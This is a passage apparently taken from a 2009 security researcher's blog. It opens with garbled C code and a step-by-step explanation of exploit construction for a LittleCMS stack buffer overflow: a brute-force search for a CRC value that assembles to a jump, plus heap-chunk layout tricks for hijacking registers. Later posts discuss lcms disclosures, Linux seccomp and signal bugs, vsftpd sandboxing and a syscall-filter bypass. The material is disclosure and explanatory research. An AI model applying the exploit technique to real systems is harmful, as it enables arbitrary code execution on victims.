    *pByte = temp1;

    double Convert15Fixed16(icS15Fixed16Number fix32)
    double floater, sign, mid, hack;
    int Whole, FracPart;

    AdjustEndianess32((LPBYTE) &fix32);

    sign = (fix32 < 0 ? -1 : 1);
    fix32 = abs(fix32);

    Whole = LOWORD(fix32 >> 16);
    FracPart = LOWORD(fix32 & 0x0000ffffL);

    hack = 65536.0;
    mid = (double) FracPart / hack;
    floater = (double) Whole + mid;

    return sign * floater;

    main(int argc, const char* argv[]) {
    unsigned int crc;
    unsigned char* p_crc;
    double params[10];
    int type = 0;
    unsigned int i;
    unsigned int start = atoi(argv[1]);

    for (i = start; i <= 0xffffffff; ++i) {
    if ((i % 10000) == 0) {
    printf("progress: %u\n", i);
    params[0] = Convert15Fixed16(i);
    LPGAMMATABLE table = cmsBuildParametricGamma(4096, type + 1, params);
    crc = table->Seed.Crc32;
    p_crc = &crc;
    if ((p_crc[0] == 0x93 || p_crc[0] == 0x95 || p_crc[0] == 0x97) &&
    p_crc[1] == 0xff &&
    p_crc[2] == 0xe6) {
    printf("got it!!!!!!! %u %u\n", i, p_crc[0]);
    return 0;
    return 1;

  • What does this program do? Let's see:

    chris@chris-desktop:~/progs$ ./a.out 3221970952
    got it!!!!!!! 3221970952 151

    This is telling us that a para curve of type 0 whose 4 input bytes are 3221970952 == 0xC00B6008 will result in 0x97 0xff 0xe6 0x?? being written to Crc32. We don't care about the last byte. This assembles to xchg %eax,%edi jmp %esi which will execute because %eip jumps to this para heap chunk, which starts with the CRC. It is urgent to do something in 4 bytes or less because we have terrible control over the rest of the content of this heap chunk. What these 3 bytes do is to overwrite %eax with %edi then jump to %esi. The significance here is that both registers we used were under our control because they were also restored from the stack we trashed with pointers to valid heap chunks.

  • So execution continues at the curve heap chunk pointed to by %esi. We arrange for this to be a curv type chunk. Earlier we dismissed them as useless because the 0 Crc32 will result in a dereference of %eax. But now, thanks to our para chunk, we've repaired %eax to point to a valid heap chunk! Unlike para chunks, curv chunks do contain arbitrary data we can supply, after a mostly-zero header. We've essentially used the control at the beginning of a para chunk to repair %eax and use the vast control at the end of a curv chunk. Before our arbitrary code executes, a bunch of now harmless 0x00 0x00 will execute, writing some junk at the start of one of our unused heap chunks. Finally, just before our arbitrary code, the value of nEntries in the header will be executed. This value is 0x02 0x00 0x00 0x00 which is add (%eax),%al add %al,(%eax). This trashes %eax a little bit before dereferencing it again, but only up to 256 bytes, so we're good and we could always use a different number of entries in our curv chunk. Certainly, a real payload would need more than 2 words.

  • The actual arbitrary code that executes is 0xeb 0xfe which is equivalent to for (;;); in C. Look out for an endian reversed instance of those two bytes, as well as an endian reversed 0xC00B6008 in the exploit file.

  • There's one further twist in the exploit relating to stack alignment. Some compilation optimization leaves no space between the end of the Curves array and the start of the saved registers. Other cases have a 4-byte gap. The exploit caters for both these stack layouts by careful layout of curv vs. para chunks. Here's a simple illustrative table:

    Curve in input fileHit if 0 gapHit if 4 bytes gap
    17: blank curvebp4-byte gap
    18: curv payloadesiebp
    19: curv payloadediesi
    20: blank curvebxedi
    21: para redirect payloadeipebx
    22: para redirect payloadeip + 4eip
    As can be seen, %eip always gets the para payload and %esi always gets the real payload.
With thanks to Julien Tinnes and Tavis Ormandy for inspiration.

Tuesday, March 17, 2009

LittleCMS vulnerabilities

Today, vendor updates should be flowing for vulnerabilities in LittleCMS, sometimes known just as "lcms" or "liblcms". LittleCMS is a very useful open-source colour profile parsing and conversion tool. Some technical details of the various vulnerabilities (stack-based buffer overflows, integer overflows, etc). are given here:

The most interesting thing about LittleCMS is how quickly it has become a very critical building block for UNIX desktops. Let's enumerate some of the pieces of software impacted by any lcms vulnerabilities:
  • OpenJDK. OpenJDK uses lcms to parse colour profiles embedded in JPEG or BMP files. OpenJDK is on the default browser attack surface of a lot of Linux installations, e.g. Fedora 10.

  • Firefox. Firefox 3.1beta uses lcms to parse colour profiles embedded in JPEG files -- by default. (Firefox 3.0 has this ability but not by default, so thankfully this can be addressed before 3.1 goes production).

  • GIMP. GIMP uses the system liblcms library to parse colour profiles embedded in at least JPEG files.
I don't usually do this, but I took the trouble to write an exploit for one of the bugs, because it was fun and had some quirks. It's probably not a great idea to release it just yet -- look for a separate blog post soon.

Finally, some notes on the various Linux system protections that do or don't help defend against the exploit for this stack-based buffer overflow:
  • My exploit targets, but is not limited to, systems with executable heaps. Interestingly 32-bit Ubuntu 8.10 on my laptop shows the heap as non-executable in /proc/<pid>/maps, but it lies because the installed kernel is non-PAE.

  • For systems with non-executable heaps, such as 64-bit Ubuntu 8.10 on my desktop, an exploit is still possible because you can point registers other than rip into the heap (e.g. rbp). I've not written this exploit.

  • Systems with stack smashing detection, such as Fedora 10, do make the exploit hard or impossible. However, the somewhat risky OpenJDK package on such a system is not compiled with stack smashing detection, leaving the default browsing experience vulnerable.

  • I noticed that the Fedora 10 stack smashing detection does not exit cleanly, but gives a SIGSEGV. On 32-bit, the faulting instruction is cmpw $0xb858,(%eax) where %eax == 0x1. Stack frames is __stack_chk_fail __fortify_fail __libc_message backtrace _Unwind_Backtrace ??. Leave a comment if you know what's going on. Sounds dangerous to me.

Wednesday, February 25, 2009

Linux kernel minor "seccomp" vulnerability

I just released some technical details on why and how "seccomp" is vulnerable to the Linux kernel syscall filtering problems that I previously blogged about. The full details may be found here:

The actual bug is of little significance because pretty much no-one uses seccomp:

This searches for the PR_SET_SECCOMP string on Google Code Search

In addition, even if people did use this -- the bug is not a full break out, just some leakage of filesystem names via stat() or mischief via unrestricted chmod().

However, I still find this vulnerability interesting. It's a sobering reminder that even a very simple security technology can have surprising bugs. seccomp applies extremely tight restrictions on untrusted code, but within these constraints, the code still has opportunities to misbehave! And this isn't the only example. For reference, check out how a seccomp-constrained process could historically cause trouble in the syscall tracing path with:

CVE-2007-4573: trouble with the upper 32-bits of %rax not clear

CVE-2008-1615: trouble calling syscalls with a bad value in the %cs register

CVE-2004-0001: trouble with EFLAGS, unknown trigger

Tuesday, February 24, 2009

Linux kernel minor signal vulnerability

I recently came up with a little API abuse of the clone() system call. Not earth shattering, but definitely fun. Essentially, you can send any signal you want at any time to your parent process, even if it is running with real and effective user id of someone else (e.g. root). Full technical details and an example may be found here:

Maybe someone more devious that me can come up with better abuse scenarios than I can. Have at it...

Signals are a tricky area of the kernel on a lot of levels. I find it interesting that every slightly unusual way to send signals in the kernel has suffered from access control issues in the past. For example, this COSEINC advisory notes issues in sending signals via prctl(PR_SET_PDEATHSIG, ...). There were multi-vendor issues with fcntl(..., F_SETOWN, ...) a long time ago which resurfaced in a Linux-specific manner a little after.

Friday, February 20, 2009

vsftpd-2.1.0 and ptrace() sandboxing

The new sandboxing support mentioned in the vsftpd-2.1.0 announcement post is actually a ptrace() based sandbox.

It is experimental and therefore off by default. It only currently supports i386 Linux (but there's no reason you couldn't hack the Makefile to build 32-bit on 64-bit Linux). When enabled, it only engages when using one_process_model, i.e. simple anonymous-only configurations. To (try and) enable it, set sandbox=YES in your config file. If you do try, please e-mail or leave a comment, even if it works!

But was it worth the effort? That's a very astute question; vsftpd already pioneered privsep support as a way of limiting the damage of a compromise of the FTP parsing code (or more likely OpenSSL, if enabled).

Let's briefly examine the damage that can be done in the event of a compromise of the low-privileged end of a privsep-based solution. Let's also assume the low-privileged end is running in a suitable chroot() jail with no sensitive, writeable or setuid files. With arbitrary code execution, the attacker can still:
  • Mount attacks against the kernel API to gain root
  • Connect to internal RFC1918 networks, i.e. firewall bypass
  • Connect to localhost, i.e. attack local-only services
  • Cause a nuisance by spraying SIGKILL signals around
  • Mess with any shared objects (e.g. POSIX shared memory) with inappropriate permissions
  • Subvert other processes with the same UID / GID via ptrace() (vsftpd defends against this as long as you set nopriv_user to a value unique to vsftpd)
  • Abuse your CPU / bandwidth

The sandbox eliminates most of the above concerns and drastically reduces the attack surface on others. On the downside, there are some minor performance losses such as an extra process per-session and per-syscall overhead but nothing severe. So for extreme paranoia, perhaps there is benefit here. We'll see.

Wednesday, February 18, 2009

vsftpd-2.1.0 released

I just released vsftpd-2.1.0, with full details being available on the vsftpd web page:

It fixes a bunch of bugs and compile errors, introduces a few minor new features, has some code clean ups, etc. etc.

vsftpd-2.1.0 is interesting from a security perspective because of its changes to SSL support. It actual contains a reasonable resolution to the connection theft attack I blogged about here:

In the linked advisory I said "I have a crazy idea to use the SSL session cache as a cheezy form of authentication". Well, thanks to investigation by Tim Kosse of FileZilla fame, it turns out this is a very feasible option. Better still, a large number of clients already (whether they know it or not) use SSL session reuse between the control and data connection. This includes up to date versions of FileZilla, lftp and command line ftp-ssl. Therefore, vsftpd now defaults to requiring SSL session reuse. If your SSL FTP client does not re-use sessions, you can turn this off but you would do better to change FTP clients. Tim's FileZilla seems like a pretty awesome option to me. Hopefully other FTP servers will follow suit (quick source code scanning of popular open source ones seemed to lack a call to the relevant SSL_session_reused OpenSSL API.

Other new security features are:
  • A per-process memory map limit of 100Mb. Just because it was easy, really. Note however!!! A memory leak in a session-private, isolated child process of a daemon cannot really be considered a security problem in this day and age -- unless you're on crack.

  • An ambitious new built-in sandbox. Think of it as privsep++, but more on this in an upcoming post and paper.

Friday, January 23, 2009

Bypassing syscall filtering technologies on Linux x86_64

For those interested in syscall filtering technologies, check out my latest advisory on how policies can be bypassed under certain circumstances:

There's a neat trick on the x86_64 kernel; this kernel supports both 32-bit and 64-bit processes, and interestingly, the syscall tables are different in either case. However, with a bit of trickery, a 64-bit process can call a 32-bit syscall (and visa versa), and confuse the syscall filter.

This was discovered whilst experimenting on a new security feature for vsftpd; a future post will go into this.